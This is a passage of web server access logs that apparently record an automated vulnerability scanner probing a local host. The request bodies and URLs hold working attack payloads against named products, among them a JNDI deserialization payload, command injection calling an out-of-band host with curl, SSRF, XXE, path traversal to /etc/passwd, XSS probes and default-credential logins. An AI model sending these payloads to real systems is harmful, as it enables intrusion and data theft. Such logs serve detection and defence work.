/api/swagger/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger/swagger-ui.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"{\x0D\x0A \x22@type\x22:\x22com.sun.rowset.JdbcRowSetImpl\x22,\x0D\x0A \x22dataSourceName\x22:\x22rmi://c9v8h8gsmpv8c1qg07h0xmnyz1tfuae5h.oast.fun/Exploit\x22,\x0D\x0A \x22autoCommit\x22:true\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.002","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/api-docs/swagger.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"{u:\x22admin\x22, t:\x22undefined\x22, p:\x22trilithic\x22, d:\x22\x22, r:false, w:false}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ViewPoint/admin/Site/ViewPointLogin HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/passwd%00&action=1&ajax=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.195","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /my.ppk HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/api-docs/swagger.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?page_id=0&&errors[fu-disallowed-mime-type][0][name]=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.192","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /adm/file.cgi?next_file=%2fetc%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger-ui/swagger.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /r2w/signIn.do?urll=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apiclient/index.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"--297MTyj3klA2PbUKlk4hfC7MDAc\x0D\x0AContent-Disposition: form-data; name=\x22297MTx0UOpkwDkvQ4jbwb3seaM1\x22; filename=\x22297MTsAFpIUfIF73cEEB8T8VlZZ.xml\x22\x0D\x0AContent-Type: application/xml\x0D\x0A\x0D\x0A\x0D\x0A \x0D\x0A \x0D\x0A ALttP\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A 12345\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A--297MTyj3klA2PbUKlk4hfC7MDAc\x0D\x0AContent-Disposition: form-data; name=\x22297MTsENrXO86tIYqisP4OD2biD\x22; filename=\x22297MTxqj3ugbFYVx4VxFGsadiCk.xml\x22\x0D\x0AContent-Type: application/xml\x0D\x0A\x0D\x0A\x0D\x0A ]>\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A <Extension>&xxe;</Extension>\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A--297MTyj3klA2PbUKlk4hfC7MDAc--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /XMLCHART HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger-ui/swagger.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /advanced_component_system/index.php?ACS_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pki/images/keyManager_title.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"connection=basic&userName=admin%27%22%29%3B%7D%3C%2Fscript%3E%3Cscript%3Ealert%28%27297MU3pWvnneYwuHyxHjZSWgRA9%27%29%3C%2Fscript%3E&pw=nordex&language=en","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.191","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/V1/store/storeConfigs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.193","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/apidocs/swagger.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /__r2/query-printRows.view?schemaName=ListManager&query.queryName=ListManager&query.sort=Nameelk5q%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ezp59r&query.containerFilterName=CurrentAndSubfolders&query.selectionKey=%24ListManager%24ListManager%24%24query&query.showRows=ALL HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"user=admin&password=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /service/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system/bgservlets/test.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.194","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pyproject.toml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"{\x22command\x22:\x22setWanPortSt\x22,\x22proto\x22:\x22dhcp\x22,\x22port\x22:\x224\x22,\x22vlan_tagged\x22:\x221\x22,\x22vlanid\x22:\x225\x22,\x22mtu\x22:\x22; curl c9v8h8gsmpv8c1qg07h07kbxp6a1nbkim.oast.fun;\x22,\x22data\x22:\x22hi\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ztp/cgi-bin/handler HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /gitlab/build_now%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/login.html?lang=en HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Visitor//%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows%5Cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi/cal?year=2021%3C/title%3E%3Cscript%3Ealert(%27297MTxwTdERHBtNvYGC0KPJvSFF%27)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"command=show basic-info dev&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /WEB_VMS/LEVEL15/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.194","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"alibaba.interact.sh","request":"GET http://alibaba.interact.sh/dynamic/instance-identity/document HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"1.193","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sslmgr HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.198","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/20 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.200","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /license.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/21 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /297MTtUegKsMnfUvmfP5FWLfhVK.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.195","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /templates/m/inc_head.php?q=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/23 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/namespaces/default/pods HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/24 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphql/schema.yaml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.204","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /remote/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.206","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://c9v8h8gsmpv8c1qg07h01ya9pxw8uzcng.oast.fun HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/25 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/playground HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /scripts/logdownload.php?dlfilename=juicyinfo.txt&path=../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /creaprezzi.php?prezzoperiodo4=%22> HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/subscriptions HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/26 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"{\x22sheet\x22:[\x22.es(*)\x22],\x22time\x22:{\x22from\x22:\x22now-1m\x22,\x22to\x22:\x22now\x22,\x22mode\x22:\x22quick\x22,\x22interval\x22:\x22auto\x22,\x22timezone\x22:\x22Asia/Shanghai\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/timelion/run HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET 